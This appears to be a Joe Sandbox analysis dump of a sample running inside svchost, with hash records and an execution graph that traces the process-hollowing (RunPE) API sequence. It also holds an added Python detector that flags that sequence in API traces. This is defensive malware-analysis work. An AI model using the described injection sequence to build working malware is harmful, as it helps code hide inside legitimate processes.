                                                                                        • Instruction Fuzzy Hash: 9CD1F370A04655CFCB16CF68C890ABEBBF5FF45314F18859BD8499B222D335E886CB91
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000E.00000002.651016367.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_14_2_14d0000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 78754c5aa2839fc589183c68e957e3071dd8cd961cccab1737ef7189f3905057
                                                                                        • Instruction ID: b0a08e693321246a9bc35d14256f57a2842bff938d7dc9ffdd97a51a9fcd2b2c
                                                                                        • Opcode Fuzzy Hash: 78754c5aa2839fc589183c68e957e3071dd8cd961cccab1737ef7189f3905057
                                                                                        • Instruction Fuzzy Hash: 39C18E749006669FCF16CB18C5E49BEFBB0FB05310F598256E8A997627C730F891CBA4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000E.00000002.651016367.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_14_2_14d0000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: f44a078cf39c5cd1d89ff2c281a1f225b6c5a5f74c96daf5c874c596c60840b9
                                                                                        • Instruction ID: 1d195875ecb1d82b51c685c32963584b860bdb5d9974093abccc1a4f65a62a9d
                                                                                        • Opcode Fuzzy Hash: f44a078cf39c5cd1d89ff2c281a1f225b6c5a5f74c96daf5c874c596c60840b9
                                                                                        • Instruction Fuzzy Hash: 6FA1E670B002598FDF11DF95C860BAEBBF2FF98710F14465AE511A73A5CBB49842CB91
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000E.00000002.651016367.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_14_2_14d0000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 1bc801fbc3c3a23e0e257d503958276c2a5b1ba7289e9147b53523ebe4b417d8
                                                                                        • Instruction ID: 04fbfb799ff7d641625c770ed27e0ed2505788c75b6c3d08f8e19e66581453fc
                                                                                        • Opcode Fuzzy Hash: 1bc801fbc3c3a23e0e257d503958276c2a5b1ba7289e9147b53523ebe4b417d8
                                                                                        • Instruction Fuzzy Hash: A7B10574A00616CFCB15CF68C694AAEF7F1FF89304F68891AE459A7221D331F885CB95
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000E.00000002.651016367.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_14_2_14d0000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: ddc4a5901d8069b21ba8bd8ffd274ab7cc1a9efea230818bff0ba3100516906d
                                                                                        • Instruction ID: 12d46ef9599b066bcee2011ffad72deac87ec2d3c816c0aeeb848751d13f3434
                                                                                        • Opcode Fuzzy Hash: ddc4a5901d8069b21ba8bd8ffd274ab7cc1a9efea230818bff0ba3100516906d
                                                                                        • Instruction Fuzzy Hash: E681CF319006018FCB65DF69C9809AAFBF1FF85314B19C5AED849DB612E736EC42CB90
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000E.00000002.651016367.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_14_2_14d0000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 113802bef242c120b2a728886fcfa90a9da4267e0313e80aab2a88626440ff43
                                                                                        • Instruction ID: 1017d244aeff4219f84acb3a1c0d77848a80de35cadd0f8e0e949b48a1d14517
                                                                                        • Opcode Fuzzy Hash: 113802bef242c120b2a728886fcfa90a9da4267e0313e80aab2a88626440ff43
                                                                                        • Instruction Fuzzy Hash: 544182307017108FEB698B29D8A4A6F77F6FF88312F14852AF85687364DB349943CB51
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000E.00000002.651016367.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_14_2_14d0000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 18b57f486e159a97472f96a146a76c8993dfe94f59ba87ff30542beebbad9247
                                                                                        • Instruction ID: 4730aca4ec8bce0b5606f266f3bc1c94e86ca5661744efd09feef9acf6bf9658
                                                                                        • Opcode Fuzzy Hash: 18b57f486e159a97472f96a146a76c8993dfe94f59ba87ff30542beebbad9247
                                                                                        • Instruction Fuzzy Hash: C9312770D00248DFDF14CFA9C590ADEBFF1AF48350F24852AE809AB250DB389941CFA4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000E.00000002.651016367.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_14_2_14d0000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 8b8d5eda5bac52c56b11fe2465f74f412c238a77e8c6215e013fad92f1dcec68
                                                                                        • Instruction ID: d9e673b5d918ef052573671e3dfd791487bd18e19507c35469dcb35893957a20
                                                                                        • Opcode Fuzzy Hash: 8b8d5eda5bac52c56b11fe2465f74f412c238a77e8c6215e013fad92f1dcec68
                                                                                        • Instruction Fuzzy Hash: 37314E74B002159FEB14CB25CD95FAEB7B2AF81304F0480E5E649AB2A1DEB4AD81CB45
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000E.00000002.651016367.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_14_2_14d0000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 7bc7a5d5449dc8e312d3cecb711e8f4aa87695eb65c5430df3a5e2f9c0669c71
                                                                                        • Instruction ID: 608d1f534e59e16d4951edf739b6b1c89aa29b3991c7d7677ffac49d69661305
                                                                                        • Opcode Fuzzy Hash: 7bc7a5d5449dc8e312d3cecb711e8f4aa87695eb65c5430df3a5e2f9c0669c71
                                                                                        • Instruction Fuzzy Hash: 273139B0D00248DFDF14CFAAC590ADEBFF5AF48740F14842AE819AB250DB389941CFA4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000E.00000002.650751489.00000000011FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011FD000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_14_2_11fd000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 768b119688a3c7d9403f8ff4eb9126410db031a7c796d72e67bd70b47e1b728a
                                                                                        • Instruction ID: 37bef43457755d1f8199ab97b415d66b89c6266d908b70eb2f941494fc6c4276
                                                                                        • Opcode Fuzzy Hash: 768b119688a3c7d9403f8ff4eb9126410db031a7c796d72e67bd70b47e1b728a
                                                                                        • Instruction Fuzzy Hash: C72128B1504244DFDF09DF58E9C0B66BF65FB84324F24C66DEA050B606C336E846C7A2
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000E.00000002.650751489.00000000011FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011FD000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_14_2_11fd000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 97331d48464294482abd899ae602d41c22f493af8353a9df4f2a9c8c19cad339
                                                                                        • Instruction ID: 26592816c3c801ebc12886c9dafae2b21bea73aee17a602343f434a125895689
                                                                                        • Opcode Fuzzy Hash: 97331d48464294482abd899ae602d41c22f493af8353a9df4f2a9c8c19cad339
                                                                                        • Instruction Fuzzy Hash: 4A213A71504240DFDF1ADF58E9C4B26BF75FB84728F24856DEA050B216C336D846D7A2
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000E.00000002.651348486.0000000002CED000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CED000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_14_2_2ced000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 85e43aacae64b478f4a83c1f79f9a15c992e51e11bc8b75780d50148b2457007
                                                                                        • Instruction ID: 3dcd4a71a2d93d2a8a3c6daf8af5b86aa53191009866bd17610b118321371811
                                                                                        • Opcode Fuzzy Hash: 85e43aacae64b478f4a83c1f79f9a15c992e51e11bc8b75780d50148b2457007
                                                                                        • Instruction Fuzzy Hash: 032104B5504240DFDF15DF54D9C0B26BBA9FB88324F24CA69E84B4B246C336DC46CB61
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000E.00000002.650751489.00000000011FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011FD000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_14_2_11fd000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: b3d282c62180620417641dd9b9a0e49e7b7255b4f86f8dc055538552fd58bc37
                                                                                        • Instruction ID: 37fffb4bdd849a45aa3111f8f8d7f82432f2d155337bd9f325e7bd18bec028e5
                                                                                        • Opcode Fuzzy Hash: b3d282c62180620417641dd9b9a0e49e7b7255b4f86f8dc055538552fd58bc37
                                                                                        • Instruction Fuzzy Hash: 8511DF72404280CFCF06CF04D5C0B66BF62FB84324F28C6ADD9040BA16C33AE456CBA2
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000E.00000002.650751489.00000000011FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011FD000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_14_2_11fd000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: b3d282c62180620417641dd9b9a0e49e7b7255b4f86f8dc055538552fd58bc37
                                                                                        • Instruction ID: 4b278a441f2cd9271ccd30be6258b2c761271d5e4b8150d20479e0e1f17335ce
                                                                                        • Opcode Fuzzy Hash: b3d282c62180620417641dd9b9a0e49e7b7255b4f86f8dc055538552fd58bc37
                                                                                        • Instruction Fuzzy Hash: A611B176504280CFDF16CF54E5C4B26BF71FB84324F2486ADD9050B626C336D456CBA2
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000E.00000002.651348486.0000000002CED000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CED000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_14_2_2ced000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: f825cc49a36603e58b05d30dbcded4ff69a659c0c942629433790640a090c2f4
                                                                                        • Instruction ID: a0d24ca481e4edbbe56675f14deea0debb91e6bfb99f3f6ae75603174c766cec
                                                                                        • Opcode Fuzzy Hash: f825cc49a36603e58b05d30dbcded4ff69a659c0c942629433790640a090c2f4
                                                                                        • Instruction Fuzzy Hash: F8119D75504280DFDF16CF14D5C4B15BBB1FB84324F28C6AED84A4B656C33AD94ACB61
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000E.00000002.651016367.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_14_2_14d0000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 23cdbac79591dfd8399b101764bcbf71cbcd8dc6984934c86921ce4efd5a97a1
                                                                                        • Instruction ID: 2d2019d780375d86aab9e74ec8c2ccfed94aece024eb73e3bbd3bc2bcff74bcb
                                                                                        • Opcode Fuzzy Hash: 23cdbac79591dfd8399b101764bcbf71cbcd8dc6984934c86921ce4efd5a97a1
                                                                                        • Instruction Fuzzy Hash: BA11A3342046148FCB62CB14C594D6AB7FAFB89324B18C59FE8498B722D731FC46CB91
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000E.00000002.650751489.00000000011FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011FD000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_14_2_11fd000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: a0c8d48592ff6c175e46a147e4e8363bbf30729c00d6fb636af7c22b323763d0
                                                                                        • Instruction ID: c3aacf612f1a94982f89c42668259be06223e8496de757ac73e2916c7e6c1172
                                                                                        • Opcode Fuzzy Hash: a0c8d48592ff6c175e46a147e4e8363bbf30729c00d6fb636af7c22b323763d0
                                                                                        • Instruction Fuzzy Hash: 6601FC3250C3849AEF194A69DC84776BF98EF40774F08855EEE051E242C3749844CAB5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000E.00000002.650751489.00000000011FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011FD000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_14_2_11fd000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 811c0b12314cfe29a24cc698738e52779f56caa536450a1b2070005324300319
                                                                                        • Instruction ID: 27ea124ebdd3450c8616bc2d8c3199dd9e8176fdba28512252aa556743b65317
                                                                                        • Opcode Fuzzy Hash: 811c0b12314cfe29a24cc698738e52779f56caa536450a1b2070005324300319
                                                                                        • Instruction Fuzzy Hash: BDF0C2725082849EEB158A1ADC84B62FF98EB81734F18C55EEE081F282C3789844CAB0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000E.00000002.651016367.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_14_2_14d0000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: e19a36b643ecad74ab8e3884951d356b47645254dcee1533935bc1b8b6e3558e
                                                                                        • Instruction ID: 6a22517867a3a53444424914dfac3ff35bd0c12d595d8faada3baf711c878536
                                                                                        • Opcode Fuzzy Hash: e19a36b643ecad74ab8e3884951d356b47645254dcee1533935bc1b8b6e3558e
                                                                                        • Instruction Fuzzy Hash: 88C048342A02088F8204DB59D484C5033A8AF48A2935100D8E5098B732CB22FC52CA80
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000E.00000002.651016367.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_14_2_14d0000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 3176f76a3b5178d50bb2fb78170327d9da517e149dc08357df451210d3de30ab
                                                                                        • Instruction ID: 384d2b4bdbf9597e8a79542763785c7cf21ed74b7da1ddbaff035bc9b8b037a3
                                                                                        • Opcode Fuzzy Hash: 3176f76a3b5178d50bb2fb78170327d9da517e149dc08357df451210d3de30ab
                                                                                        • Instruction Fuzzy Hash: F9C092342A0208CFC648DF59D484C5073ACFF48A1936100D9E9098B732CB32FC02CA90
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Execution Graph

                                                                                        Execution Coverage:23.3%
                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                        Signature Coverage:0%
                                                                                        Total number of Nodes:79
                                                                                        Total number of Limit Nodes:3
                                                                                        execution graph (rendered graph not reproduced; the call chain below is recovered from the node and edge dump)
                                                                                        • 54a0448 → 54a044e → 54a1eb8 / 54a1ef7 → 54a1f18 → 54a3658 / 54a3668 (13 API calls) → 54a49ac
                                                                                        • 54a49ac → 54a5020 / 54a5014: CreateProcessAsUserA at 54a50ad
                                                                                        • 54a4aea → 54a5518 / 54a5510: ReadProcessMemory at 54a5560 / 54a5518
                                                                                        • 54a4bc6, 54a4c3d → 54a5608 / 54a5600: VirtualAllocEx at 54a564b / 54a5608
                                                                                        • 54a4c7f, 54a4ca8, 54a4d98 → 54a56a8 / 54a56b0: WriteProcessMemory at 54a56b0 / 54a56fb, looped from 54a4ca8 / 54a4d98
                                                                                        • 54a4dd9, 54a4e13 → 54a5458 / 54a5450: SetThreadContext at 54a54a0 / 54a5458
                                                                                        • 54a4e30 → 54a57e0 / 54a57e8 / 54a5779: ResumeThread at 54a57e2 / 54a5829; return through 54a4e58 to 54a3668
                                                                                        The order CreateProcessAsUserA → ReadProcessMemory → VirtualAllocEx → WriteProcessMemory → SetThreadContext → ResumeThread is the RunPE / process-hollowing sequence behind the "Injects a PE file into a foreign processes" signature listed for this sample.
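The execution graph above is, in effect, an ordered API trace of one process: CreateProcessAsUserA, then ReadProcessMemory, VirtualAllocEx, a loop of WriteProcessMemory calls, SetThreadContext and finally ResumeThread. The Python below is an added example, not code from Joe Sandbox or from the analysed sample: a small state machine that flags exactly that chain in a per-process API trace and tolerates the variants a practitioner meets (the PEB read being skipped, several writes for headers and sections, ntdll-level names from a tracer that hooks below kernelbase). The trace format, the pid numbers and the Nt* alias names are assumptions of the example; this report shows the call arguments as "?", so the CREATE_SUSPENDED check only fires when a tracer does record the creation flags.

```python
"""Flag the RunPE / process-hollowing API chain in a per-process API trace.
Added example for this report, not Joe Sandbox or sample code; the trace
format (pid, API name, optional key=value arguments per line) is constructed."""
from dataclasses import dataclass
from typing import Dict, List, Optional

CREATE_SUSPENDED = 0x00000004  # dwCreationFlags bit in CreateProcess*

# Stages in the order the execution graph shows them: (name, API names, optional).
# Nt* names are assumed aliases for tracers that hook ntdll rather than kernelbase.
STAGES = [
    ("create", {"CreateProcessAsUserA", "CreateProcessAsUserW", "CreateProcessA", "CreateProcessW"}, False),
    ("read",   {"ReadProcessMemory", "NtReadVirtualMemory"}, True),   # some loaders skip the read
    ("alloc",  {"VirtualAllocEx", "NtAllocateVirtualMemory"}, False),
    ("write",  {"WriteProcessMemory", "NtWriteVirtualMemory"}, False),
    ("ctx",    {"SetThreadContext", "NtSetContextThread", "Wow64SetThreadContext"}, False),
    ("resume", {"ResumeThread", "NtResumeThread"}, False),
]
ORDER = [name for name, _, _ in STAGES]
API_TO_STAGE = {api: name for name, apis, _ in STAGES for api in apis}
WRITE_IDX = ORDER.index("write")


@dataclass
class ApiCall:
    pid: int
    api: str
    args: Dict[str, str]


@dataclass
class Finding:
    pid: int
    stages: Dict[str, int]     # stage name -> index of the satisfying call within the pid
    write_count: int           # remote writes between the allocation and SetThreadContext
    suspended_confirmed: bool  # True only if a flags argument was present and had CREATE_SUSPENDED


def parse_trace(text: str) -> List[ApiCall]:
    """Parse the constructed trace format; lines starting with '#' are comments."""
    calls = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        pid, api, *kvs = line.split()
        args = dict(kv.partition("=")[::2] for kv in kvs)  # "k=v" -> {"k": "v"}
        calls.append(ApiCall(int(pid), api, args))
    return calls


def _chain_for_pid(pid: int, seq: List[ApiCall]) -> Optional[Finding]:
    expected = 0                   # index into ORDER of the next stage still needed
    matched: Dict[str, int] = {}
    write_count = 0
    suspended = False
    for i, call in enumerate(seq):
        stage = API_TO_STAGE.get(call.api)
        if stage is None:
            continue
        k = ORDER.index(stage)
        if stage == "write" and expected == WRITE_IDX + 1:
            write_count += 1       # further writes (headers, then each section) extend the stage
            continue
        # Accept only the next stage, or a later one with nothing but optional stages skipped.
        if k < expected or not all(STAGES[j][2] for j in range(expected, k)):
            continue
        if stage == "create":
            flags = call.args.get("flags")
            if flags is not None and int(flags, 0) & CREATE_SUSPENDED == 0:
                continue           # started running, so a hollowing chain cannot begin here
            suspended = flags is not None
        if stage == "write":
            write_count = 1
        matched[stage] = i
        expected = k + 1
        if expected == len(ORDER):
            return Finding(pid, matched, write_count, suspended)
    return None


def detect_hollowing(calls: List[ApiCall]) -> List[Finding]:
    """One Finding per pid whose calls contain the whole chain in order."""
    by_pid: Dict[int, List[ApiCall]] = {}
    for call in calls:
        by_pid.setdefault(call.pid, []).append(call)
    hits = (_chain_for_pid(pid, seq) for pid, seq in by_pid.items())
    return [f for f in hits if f is not None]


# Constructed trace: pid 39 follows the execution graph above, with the
# WriteProcessMemory loop as repeated writes; pid 41 writes without a suspended create.
SAMPLE_TRACE = """
39 CreateProcessAsUserA flags=0x4
39 ReadProcessMemory
39 VirtualAllocEx
39 WriteProcessMemory
39 WriteProcessMemory
39 WriteProcessMemory
39 SetThreadContext
39 ResumeThread
41 VirtualAllocEx
41 WriteProcessMemory
41 ResumeThread
"""

if __name__ == "__main__":
    for f in detect_hollowing(parse_trace(SAMPLE_TRACE)):
        print(f"pid {f.pid}: chain {f.stages}, {f.write_count} write(s), suspended: {f.suspended_confirmed}")
```

The order check is what keeps this from firing on ordinary debuggers and installers: a remote write that precedes the allocation, or any chain that does not start with a process creation, is rejected, and pid 41 in the constructed trace shows that. The natural next hardening, not done here, is to carry the process handle returned by the create call and require that every later stage targets that same handle; the sandbox output in this report does not record the arguments, so the example keys only on call order and, where present, the creation flags.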

                                                                                        Control-flow Graph (rendered graph not reproduced; executed / not-executed block colouring lost in extraction)
                                                                                        • Function 54a5014, basic blocks 54a5014 to 54a53b0
                                                                                        • CreateProcessAsUserA called from block 54a520a-54a52c6; successors 54a52c8-54a52ce and 54a52cf-54a5343
                                                                                        APIs
                                                                                        • CreateProcessAsUserA.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 054A52B3
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000027.00000002.623397158.00000000054A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054A0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_39_2_54a0000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateProcessUser
                                                                                        • String ID: U
                                                                                        • API String ID: 2217836671-3372436214
                                                                                        • Opcode ID: 590249ddbbbbce10f0ef15760ed27faffc7166374e293633f9ac3abf9acd313a
                                                                                        • Instruction ID: ddce29af2c2872459ee2fd22fe846ff44fff4648ea93630665e45d71a0265206
                                                                                        • Opcode Fuzzy Hash: 590249ddbbbbce10f0ef15760ed27faffc7166374e293633f9ac3abf9acd313a
                                                                                        • Instruction Fuzzy Hash: 27A14B72D042199FDF50DF68C9417EEBBB2FF58304F0481AAE819A7290E7749985CF91
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph (rendered graph not reproduced; executed / not-executed block colouring lost in extraction)
                                                                                        • Function 54a5779, basic blocks 54a5779 to 54a5871
                                                                                        • ResumeThread called from block 54a57e2-54a5854; successors 54a5856-54a585c and 54a585d-54a5871
                                                                                        • Alternate path 54a5787-54a57a1 calls 54a2338 instead
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000027.00000002.623397158.00000000054A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054A0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_39_2_54a0000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID: ResumeThread
                                                                                        • String ID: V
                                                                                        • API String ID: 947044025-1342839628
                                                                                        • Opcode ID: e3cf8db444520cde8d7d7de00e605cd2fc19639e7447c8f9894f3f6d3b8883f9
                                                                                        • Instruction ID: 415f7ba5fc3ef9748d744e8e261d6b93c0d1175494426a1059b8366d2223cbc7
                                                                                        • Opcode Fuzzy Hash: e3cf8db444520cde8d7d7de00e605cd2fc19639e7447c8f9894f3f6d3b8883f9
                                                                                        • Instruction Fuzzy Hash: 80214AB6C00208CFCB50CF9ADA85BEEBBF4EB58320F10845AD419B7740D775AA408FA5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph (rendered graph not reproduced; executed / not-executed block colouring lost in extraction)
                                                                                        • Function 54a5020, basic blocks 54a5020 to 54a53b0
                                                                                        • CreateProcessAsUserA called from block 54a520a-54a52c6; successors 54a52c8-54a52ce and 54a52cf-54a5343
                                                                                        APIs
                                                                                        • CreateProcessAsUserA.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 054A52B3
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000027.00000002.623397158.00000000054A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054A0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_39_2_54a0000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateProcessUser
                                                                                        • String ID:
                                                                                        • API String ID: 2217836671-0
                                                                                        • Opcode ID: 09fe3c7a6b6508d2511c1cefe5499e8045956b225604f86ff42dd73349a35d1c
                                                                                        • Instruction ID: c7b1a06150e61c81a5b8868adf2924800813098742b15b9f16c31478eab1ec61
                                                                                        • Opcode Fuzzy Hash: 09fe3c7a6b6508d2511c1cefe5499e8045956b225604f86ff42dd73349a35d1c
                                                                                        • Instruction Fuzzy Hash: B4A14A72E042199FDF50CF68C9417EEBBB2FF58304F0481AAE819A7290D7749985CF91
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph (rendered graph not reproduced; executed / not-executed block colouring lost in extraction)
                                                                                        • Function 54a56a8, basic blocks 54a56a8 to 54a5774
                                                                                        • WriteProcessMemory called from block 54a5711-54a574a; successors 54a574c-54a5752 and 54a5753-54a5774
                                                                                        APIs
                                                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 054A573D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000027.00000002.623397158.00000000054A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054A0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_39_2_54a0000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID: MemoryProcessWrite
                                                                                        • String ID:
                                                                                        • API String ID: 3559483778-0
                                                                                        • Opcode ID: f0e97d8aff09d183cb5b547b1e44e7f3113bf9f738fefd9370fc7c79e1c0be45
                                                                                        • Instruction ID: 734d470801636dd1bcf383640f159ed001491b120bf030217e9b11fec99af196
                                                                                        • Opcode Fuzzy Hash: f0e97d8aff09d183cb5b547b1e44e7f3113bf9f738fefd9370fc7c79e1c0be45
                                                                                        • Instruction Fuzzy Hash: 0321F6B5900209DFCF10CF9AD985BDEBBF4FB48310F10842AE519A7350D778A540CBA5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph (rendered graph not reproduced; executed / not-executed block colouring lost in extraction)
                                                                                        • Function 54a56b0, basic blocks 54a56b0 to 54a5774
                                                                                        • WriteProcessMemory called from block 54a5711-54a574a; successors 54a574c-54a5752 and 54a5753-54a5774
                                                                                        APIs
                                                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 054A573D
